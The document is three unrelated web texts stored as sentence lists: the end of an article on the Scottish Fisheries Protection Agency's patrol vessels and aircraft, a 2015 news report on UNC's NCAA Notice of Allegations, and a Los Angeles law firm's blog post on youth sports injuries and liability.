£9,421,000 for 2008–2009\n\nJura Type\nThe Jura-type offshore patrol vessels were 84m in length with a displacement of 2,200 tonnes. ", "These vessels could stay on effective patrol for up to 30 days although the normal patrol length remains at 21 days. ", " The first vessel of the type, FPV Jura, was constructed by Ferguson Shipbuilders of Port Glasgow, joining the fleet in March 2006.", "\n\nAn earlier FPV Jura was built in 1973 by Hall Russell of Aberdeen, Scotland. ", "Her success on loan to the Royal Navy as HMS Jura led to the building of a further seven Island-class patrol vessels.", "\n\nIn the tendering for the next two Jura-type vessels, the Scottish Executive awarded the contract to a Polish shipbuilder rather than Fergusons, sparking strong criticism from the Scottish National Party. ", "FPV Hirta, was constructed in Remontowa Shipyard, Poland, and launched on 17 August 2007. ", "The vessel joined the fleet in May 2008. ", "Plans to build a third vessel were postponed.", "\n\nMinna Type\nThe Minna type were inshore/offshore patrol vessels with a displacement of 781 tonnes and a maximum speed of 14 knots. ", "Vessels of this type can also spend up to 21 days on patrol. ", "There was only one vessel of this type, FPV Minna constructed by Ferguson Shipbuilders and launched in 2003.", "\n\nIn May 2006, the vessel replacement programme was delayed, when the SFPA was forced to suspend the tender process for a second Minna type vessel after it was found that the process was in breach of EU procurement rules.", "\n\nA subsequent tender exercise using consultancy resources rather than Scottish Executive personnel to carry out the procurement activities commenced in early 2007, but was postponed following the May 2007 Scottish Elections and the rise to power of the Scottish National Party.", "\n\nThe current Minna was the third FPV to bear the name (named after a character in Sir Walter Scott's novel The Pirate). ", " Previous vessels of this name served between 1901–1939 and 1939–1974.", "\n\nHistorical Types\n\nThe Sulisker type were offshore patrol vessels with a displacement of 1,365 tonnes and a maximum speed of 18 knots. ", "They could spend up to 21 days on patrol. ", "The first of the type, FPV Sulisker was launched in 1980, decommissioned late 2006 and is currently undergoing conversion to a luxury yacht in Lowestoft. ", " FPV Vigilant, launched in 1982, was decommissioned in Spring 2008. ", "The last of this type in service was FPV Norna which was launched in 1987 and paid off in October 2010.", "\n\nThe last of the Island type, FPV Westra was launched in 1975 and decommissioned in 2003. ", "The vessel was purchased by Sea Shepherd Conservation Society in 2006 and was renamed MY Robert Hunter in memory of one of the two founding members of Greenpeace. ", "The vessel has since been renamed MY Steve Irwin after the death of the famous conservationist TV personality. ", "The Steve Irwin has become a popularly recognised ship due to the Animal Planet television programme Whale Wars which documents the work of Sea Shepherd including their use of the vessel. ", "The Island type were offshore patrol vessels with a displacement of 1,017 tonnes and a maximum speed of 16.5 knots. ", "In contrast to the more modern vessel types, the Island type could only remain on patrol for 16–18 days.", "\n\nAerial Surveillance\nThe SFPA also had two surveillance aircraft, both Reims Vigilant F-406, based at Inverness Airport. ", "The aircraft are operated by Directflight under contract.", "\n\nThe main tasks of the aerial surveillance aircraft are to:\n Validate the UK VMS system\n Monitor the activities of fishing vessels not equipped with VMS (less than 15m length)\n Patrol the increasing number of sea areas closed to fishing operations either to protect fish stocks or the habitats contained within an area.", "\n Monitor fishing activities in the international waters adjacent to UK fishery limits and under the control of NEAFC, particular to detect and deter IUU fishing.", "\n\nIn 2010, the aircraft were out of service for 6 weeks due to \"documentation issues\"\n\nSee also\n Marine and Fisheries Agency of England and Wales\n\nNotes and references\n\nExternal links\n Marine Scotland\nMarine Scotland Compliance\n SFPA homepage\n\nCategory:Defunct bodies of the Scottish government\nCategory:Fishing in Scotland\nCategory:Conservation in Scotland\nCategory:Environment of Scotland\nCategory:Law enforcement agencies of Scotland\nCategory:1811 establishments in Scotland\nCategory:Government agencies established in 1811\nCategory:Fisheries protection" ]
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[ "CHAPEL HILL, N.C. – The University of North Carolina has received its Notice of Allegations from the NCAA, but will not release the details of the report until a later date, according to sources familiar with the investigation.", "\n\n\n\n\n\n\n\nThe NCAA does not publicly announce delivery of a Notice of Allegations and member institutions are not required to release the full report. ", "UNC is expected to announce the receipt of its NOA on Friday afternoon.", "\n\n\n\n\n\nUNC announced in June 2014 that the NCAA had reopened its 2011 examination of academic irregularities after the enforcement staff determined that additional people with information and others who were previously uncooperative might be willing to talk with investigators.", "\n\n\n\n\n\n\n\nThat announcement coincided with new information that Kenneth Wainstein uncovered during his investigation into irregular classes in UNC’s AFAM department. ", "His report, released in October, detailed how department secretary Deborah Crowder coordinated the classes for nearly two decades without detection. ", "More than 3,100 students were involved and student-athletes accounted for 47.4 percent of the course enrollments.", "\n\n\n\n\n\nFor details on the NCAA process, read InsideCarolina.com’s two-part feature this week on the\n\nenforcement basics and the NCAA’s challenge in\n\ndetermining allegations in a unique case.", "\n\n\n\n\n\n***\n\n\n\n\n\n\n\n12:35pm Update: UNC has now issued the following press release ...\n\n\n\n\n\n\n\n(Chapel Hill, N.C.—May 22, 2015) – The University of North Carolina at Chapel Hill today announced the campus had received a notice of allegations from the NCAA as the next phase in its investigation of academic irregularities and possible bylaw infractions.", "\n\n\n\n\n\n\n\nIn a joint statement, Chancellor Carol L. Folt and Director of Athletics Bubba Cunningham said the University had begun reviewing the NCAA’s notice.", "\n\n\n\n\n\n\n\n“We take these allegations very seriously, and we will carefully evaluate them to respond within the NCAA’s 90-day deadline,” the statement said. “", "The University will publicly release the NCAA’s notice as soon as possible. ", "The notice is lengthy and must be prepared for public dissemination to ensure we protect privacy rights as required by federal and state law. ", "When that review for redactions is complete, the University will post the notice on the Carolina Commitment website and notify the news media. ", "When we respond to the NCAA’s allegations, we will follow this same release process.", "\n\n\n\n\n\n\n\n“Consistent with NCAA protocols, the University cannot comment on details of the investigation until it is completed.”", "\n\n\n\n\n\n\n\n" ]
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[ "PERSONAL INJURY BLOG\n\nLOS ANGELES—For most children and teens, playing soccer, basketball, baseball, football or participating in another athletic experience leads to a lifetime of memories. ", "Most of the time, these are fond memories. ", "However, in recent years, the number of children’s sports injurieshas gone up dramatically. ", "Furthermore, in a recent report by the University of North Carolina’s National Center for Catastrophic Sport Injury Research, we learn that 1990 is the only year between 1931 and 2009 that a fatal injury did not occur at some level of high school, college or professional football (http://www.unc.edu/depts/nccsi/2010Allsport.pdf). ", "In that nearly eighty year span, one family each year had to confront the pain of a preventable or wrongful death. ", "Football is not the only athletic activity that leads to death or catastrophic injury, however.", "\n\nIn 2008, Lauren Chang was killed performing a cheerleading maneuver. ", "Before her, in 2005, Ashley Burns also died as a direct result of a cheerleading accident (http://abcnews.go.com/Health/cheerleader-dies/story?id=4693144). ", "For many girls, cheerleading results in paralysis, concussion, broken bones, and other impacts that are more difficult to quantify.", "\n\nIn 2004, 14 year-old Brittany Noffke fell while practicing a cheerleading maneuver at her Wisconsin high school. ", "She suffered a skull fracture, serious concussion, and brain damage. ", "The physical pain healed after several months, but Brittany continued to struggle with debilitating anxiety and depression. ", "The family’s medical bills also contributed to their eventual bankruptcy. ", "Brittany and her family are not alone in the suffering they endured.", "\n\nConcussions for male and female athletes; ligament tears; spinal injuries; heat stroke; broken limbs and brain damage can all result from school sponsored sports, physical education classes and club activities including cheerleading and dance team participation. ", "With the extensive information available, perhaps such injuries will begin to decrease in numbers. ", "The efforts of certain organizations may be educating the public, the parents, the players, and the coaches involved.", "\n\nOrganizations like the Sports Medicine Center for Young Athletes at the Children’s Hospital of Oakland offer extensive information on how to prevent and treat child sports injuries (http://www.childrenshospitaloakland.org/healthcare/depts/sports_medicine.asp). ", "However, the authorities have a major advantage if a personal injury suit is ever filed on behalf of a child. ", "Even if the safety information is available, what is the motivation for school districts, youth sports leagues, and other such entities to prioritize safety? ", "They are almost never held liable.", "\n\nThe Noffke case is just one such instance where the injured teen was unable to getcompensation for injuries. ", "Her case was dismissed. ", "Wisconsin has a Recreational Immunity Law which protected the school district. ", "Personal injury claims related to school sports injuries have recently been dismissed in Pennsylvania, New York, and New Jersey. ", "The legal rationale is that players accept a certain level of risk when they participate in an athletic endeavor. ", "However, where is the line drawn? ", "At what point does risk become negligence or reckless behavior on the part of the guardians and authorities involved? ", "Many NFL players are trying to answer this question with a massive lawsuit against the NFL. ", "Of course NFL players accept a certain risk when they agree to play a game and get well-compensated for it. ", "But at what point does an organization take responsibility for protecting its players? ", "If school districts are almost always immune from paying damages, there seems to be little legal incentive to make sure players and performers participate safely.", "\n\nThe vast majority of players and participants do not suffer catastrophic injuries as the result of participating in athletic events. ", "But there are cases throughout the country of children being pushed to try more dangerous cheerleading maneuvers, hit the ball farther, and increase their speed and size to inflict greater damage on their opponents. ", "Furthermore, the injuries are happening to younger and younger children.", "\n\nThe recent lawsuit filed on behalf of NFL players has brought increased scrutiny to the role of concussions in professional football. ", "However, concussions are a significant problem in every contact sport and cheerleading. ", "Furthermore, if a teen or young child suffers a concussion and continues to play in a game, the long term damage can be catastrophic. ", "The American College of Sports Medicine and other concerned organizations report that each year 60, 000 high school athletes sustain a concussion (http://www.npr.org/2011/02/02/133437361/doctors-throw-flags-on-high-school-concussions). ", "For pre-teens, the numbers may not be as high but the damage to a young brain can be even worse because their brains are still developing. ", "Thankfully, national awareness may be leading to change.", "\n\n30 states have laws that make coaches bench players who have been injured or may have suffered a concussion. ", "Now that there are laws specifically designed to protect young players, violations of those laws may lead to successful lawsuits that do a better job of holding authorities liable. ", "No doubt, these lawsuits are on the horizon for a wide-variety of reasons. ", "But one of the reasons may be that in a culture obsessed with winning, the short-term satisfaction of victory may lead to catastrophic injury if safety is not a priority. ", "With increased emphasis on better performance, greater achievement, and winning at all costs, the team may win but individual children will continue to suffer.", "\n\nARCHIVE\n\nLEDERER & NOJIMA VIDEOS\n\nDavid Lederer and John Nojima used to defend the insurance companies. ", "Now they are on your side.", "\n\nAt Lederer & Nojima LLP, in Los Angeles, California, we pride ourselves on providing our clients with the highest quality legal services and advice. ", "We recognize that our success is based upon our client's success — so we are absolutely committed to obtaining the results our clients want and need." ]
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